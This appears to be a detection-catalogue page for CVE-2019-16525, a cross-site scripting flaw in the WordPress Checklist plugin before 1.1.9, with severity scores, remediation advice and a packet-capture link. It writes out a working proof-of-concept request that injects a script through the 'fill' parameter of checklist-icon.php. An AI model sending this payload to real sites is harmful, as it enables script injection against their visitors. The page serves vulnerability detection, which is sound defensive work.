🔙 목록으로 돌아가기

CVE-2019-16525: WordPress Checklist <1.1.9 - Cross-Site Scripting

TitleWordPress Checklist <1.1.9 - Cross-Site Scripting
Authordaffainfo
SeverityMedium
ImpactAllows attackers to inject malicious scripts into web pages viewed by users, leading to potential data theft or unauthorized actions.
RemediationUpdate to the latest version of the WordPress Checklist plugin (1.1.9 or higher) to mitigate this vulnerability.
CVSS Score6.1
EPSS Score0.07197
CVE IDCVE-2019-16525
CWE IDCWE-79
Tags cve cve2019 xss wp-plugin packetstorm wordpress checklist vuln

🔍 Vulnerability Description

WordPress Checklist plugin before 1.1.9 contains a cross-site scripting vulnerability. The fill parameter is not correctly filtered in the checklist-icon.php file.

🌐 HTTP Request

GET /wp-content/plugins/checklist/readme.txt HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (ZZ; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36
Connection: close
Accept-Encoding: gzip
GET /wp-content/plugins/checklist/images/checklist-icon.php?fill=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2019/CVE-2019-16525.yaml

🦈 Packet Capture: ⬇️ Download cve-2019-16525.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A